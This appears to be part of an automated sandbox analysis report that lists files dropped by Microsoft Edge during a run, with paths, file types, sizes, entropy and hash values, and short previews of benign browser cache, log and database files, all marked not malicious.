                                                                                                                                                                SSDEEP:24:3FxrTu/h7RORMCF3GFqWF/avFnpsAF4unxK/tLp3X2amEtG1ChqXlm+MZRUY6QKo:3Lrq/hAT+/SzFaVLp2FEkChEmN7HOpg
                                                                                                                                                                MD5:A6E719B7D6DA35B8E3887FDDE7C96B41
                                                                                                                                                                SHA1:4339D68DAF607A267AB82A72DBFBA2DDD3FD9108
                                                                                                                                                                SHA-256:503CA5BA2B089F2B41A21211DD2D90A183C97F8BECB404EF4E6F1D2B148C4E0A
                                                                                                                                                                SHA-512:3DA5C1043B529B7BBE1D613528511B8F6D90742D453CA2BEF136910DB8E43B55408E25964EA90A2F113E428B59490507A8CC8F830E354C0FCB2EF0419F284D9E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:SNSS........Ma.............Ma.......".Ma.............Ma.........Ma.........Ma.........Ma.....!...Ma.................................Ma..Ma.1..,....Ma.$...12804e10_9ef4_4e57_b28a_149d80fec363....Ma.........Ma.......;.........Ma.....Ma.........................Ma.....................5..0....Ma.&...{4B3AC14B-43E5-4896-86E8-9E7D502CE1B5}......Ma............Ma.........................Ma.............Ma.........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x........._&F+...._&F+.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                Entropy (8bit):0.44194574462308833
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):358
                                                                                                                                                                Entropy (8bit):5.162223899361088
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvRryQL+q2PcNwi23oH+Tcwt7Uh2ghZIFUtJvRtyG1ZmwPvRtyQLVkwOcNwi20:79uvLZYebIhHh2FUtb1/d54ZYebIhHLJ
                                                                                                                                                                MD5:CCC47E75AA45BF944CF22B150B911849
                                                                                                                                                                SHA1:EC0615438C492D68E1A991DE80D55E9EC5FD23EA
                                                                                                                                                                SHA-256:56874881E1A7D54F88CE286B4DC8D74BECC934B2155AA16E8B3D5D69FF0C5523
                                                                                                                                                                SHA-512:7593378B8FBA74A1867C6010BFBE451B5FFD7B027328EB0B21B5122D6928999A78172D9ABF00AB54BB5522AB8A9186DC57738FEE7188DD6B90F8C2D3E2FF5304
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:28.152 1838 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/09-08:42:28.154 1838 Recovering log #3.2025/01/09-08:42:28.154 1838 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):358
                                                                                                                                                                Entropy (8bit):5.162223899361088
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvRryQL+q2PcNwi23oH+Tcwt7Uh2ghZIFUtJvRtyG1ZmwPvRtyQLVkwOcNwi20:79uvLZYebIhHh2FUtb1/d54ZYebIhHLJ
                                                                                                                                                                MD5:CCC47E75AA45BF944CF22B150B911849
                                                                                                                                                                SHA1:EC0615438C492D68E1A991DE80D55E9EC5FD23EA
                                                                                                                                                                SHA-256:56874881E1A7D54F88CE286B4DC8D74BECC934B2155AA16E8B3D5D69FF0C5523
                                                                                                                                                                SHA-512:7593378B8FBA74A1867C6010BFBE451B5FFD7B027328EB0B21B5122D6928999A78172D9ABF00AB54BB5522AB8A9186DC57738FEE7188DD6B90F8C2D3E2FF5304
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:28.152 1838 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/09-08:42:28.154 1838 Recovering log #3.2025/01/09-08:42:28.154 1838 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                Entropy (8bit):0.0018164538716206493
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zEZlxK//:/M/xT02zSKX
                                                                                                                                                                MD5:635735B659072C7A74C84B8EEC641919
                                                                                                                                                                SHA1:57B8F7389F50E8E99A68FC7BEE32CC22C3E27E2A
                                                                                                                                                                SHA-256:E06B8202DC1D78E107522178FCC2F97810A184755E24713EEB1DEC4558084ABF
                                                                                                                                                                SHA-512:22F7E6B69BA38A8760E1CF62B4F206E152BC2222565E7A0B71DF610B66B49C16ECA7CDBCB884F9540BE68866E6A0B73A98E601FC05929B4BA1BB761651F57B1D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                Entropy (8bit):0.0012471779557650352
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                Entropy (8bit):0.0012471779557650352
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):437
                                                                                                                                                                Entropy (8bit):5.234490707601754
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:7mQyvLZYebvqBQFUtE0p/SX1R54ZYebvqBvJ:75YlYebvZgU1DoYebvk
                                                                                                                                                                MD5:B64101A5D966896669F6C098E7476195
                                                                                                                                                                SHA1:72269813F2577A0CA31F991760B9324BE384C2AB
                                                                                                                                                                SHA-256:87A825A9B70FD3FC10F3B58E526B79230F7BC7340544E2104E03D7F6D5DB5160
                                                                                                                                                                SHA-512:09C97104697FE72855367DAFBAC19B87539B79BDE539061A3AA93F5A009C182F17F05F63680965AEC34220948C8FA87E7E4500F76B39BE3995AB92607E9474FA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:29.249 770 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/09-08:42:29.250 770 Recovering log #3.2025/01/09-08:42:29.253 770 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):437
                                                                                                                                                                Entropy (8bit):5.234490707601754
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:7mQyvLZYebvqBQFUtE0p/SX1R54ZYebvqBvJ:75YlYebvZgU1DoYebvk
                                                                                                                                                                MD5:B64101A5D966896669F6C098E7476195
                                                                                                                                                                SHA1:72269813F2577A0CA31F991760B9324BE384C2AB
                                                                                                                                                                SHA-256:87A825A9B70FD3FC10F3B58E526B79230F7BC7340544E2104E03D7F6D5DB5160
                                                                                                                                                                SHA-512:09C97104697FE72855367DAFBAC19B87539B79BDE539061A3AA93F5A009C182F17F05F63680965AEC34220948C8FA87E7E4500F76B39BE3995AB92607E9474FA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:29.249 770 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/09-08:42:29.250 770 Recovering log #3.2025/01/09-08:42:29.253 770 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\0dfc02e3-8945-482d-ad42-edee17732427.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2
                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:[]

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\30c17241-ff48-42b3-9cad-ea93082db9eb.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2
                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:[]

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\94269d4b-fb2a-45fa-97a1-5589da714fbb.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2
                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:[]

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2
                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:[]

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF3806c.TMP (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2
                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:[]

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF38398.TMP (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2
                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:[]

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40
                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):36864
                                                                                                                                                                Entropy (8bit):0.3886039372934488
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\a761fd9e-4acd-4067-8702-ae45b1bd043c.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40
                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):80
                                                                                                                                                                Entropy (8bit):3.4921535629071894
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):425
                                                                                                                                                                Entropy (8bit):5.263495318842846
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:7KlY1yvLZYebvqBZFUt0l+J/WlBR54ZYebvqBaJ:70iYlYebvygO+iBDoYebvL
                                                                                                                                                                MD5:D6B0F7158A5E02EC06C3EABD980BB7B3
                                                                                                                                                                SHA1:D1BB4A030F62713FD0C6C5297CF376705CA631F2
                                                                                                                                                                SHA-256:F20C313905129877A288F30E6B16517BE714A7B4D7AB4F7E4766CC6E935AC466
                                                                                                                                                                SHA-512:465686F10A2B5A8958293652A12DF0C1C2CD63FA7284B09ABD0B9E85172E57329AC8E143C3793A1DBE9E7D9CAC1A25F7B546B097479E2F99BBF11D26A039ADB3
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:45.911 770 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/09-08:42:45.913 770 Recovering log #3.2025/01/09-08:42:45.916 770 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):425
                                                                                                                                                                Entropy (8bit):5.263495318842846
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:7KlY1yvLZYebvqBZFUt0l+J/WlBR54ZYebvqBaJ:70iYlYebvygO+iBDoYebvL
                                                                                                                                                                MD5:D6B0F7158A5E02EC06C3EABD980BB7B3
                                                                                                                                                                SHA1:D1BB4A030F62713FD0C6C5297CF376705CA631F2
                                                                                                                                                                SHA-256:F20C313905129877A288F30E6B16517BE714A7B4D7AB4F7E4766CC6E935AC466
                                                                                                                                                                SHA-512:465686F10A2B5A8958293652A12DF0C1C2CD63FA7284B09ABD0B9E85172E57329AC8E143C3793A1DBE9E7D9CAC1A25F7B546B097479E2F99BBF11D26A039ADB3
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:45.911 770 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/09-08:42:45.913 770 Recovering log #3.2025/01/09-08:42:45.916 770 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):334
                                                                                                                                                                Entropy (8bit):5.190938817272335
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvRkH0FN+q2PcNwi23oH+TcwtpIFUtJvRPeAWZmwPvRPe3VkwOcNwi23oH+TcM:7SUFN+vLZYebmFUtPPW/NKV54ZYebaUJ
                                                                                                                                                                MD5:084F19BEDD3828AD9553BA13B1694B6E
                                                                                                                                                                SHA1:84DDDA91D9DA175A832B31FA059014E027BA02B5
                                                                                                                                                                SHA-256:F18FFDC95FB0FDFA6BCD154E0BE06A7F3C9B17B87ECE685E1D8DB408A6611524
                                                                                                                                                                SHA-512:A57FC1AC430D7F8DFD3886AD2CBA71E93092D12920905CC865F53EEC5778613A0FD3C2B4F34F2CF191D52F9C887105FF1D1A2490C45B482F30E935CEAAC03020
                                                                                                                                                                Malicious:false
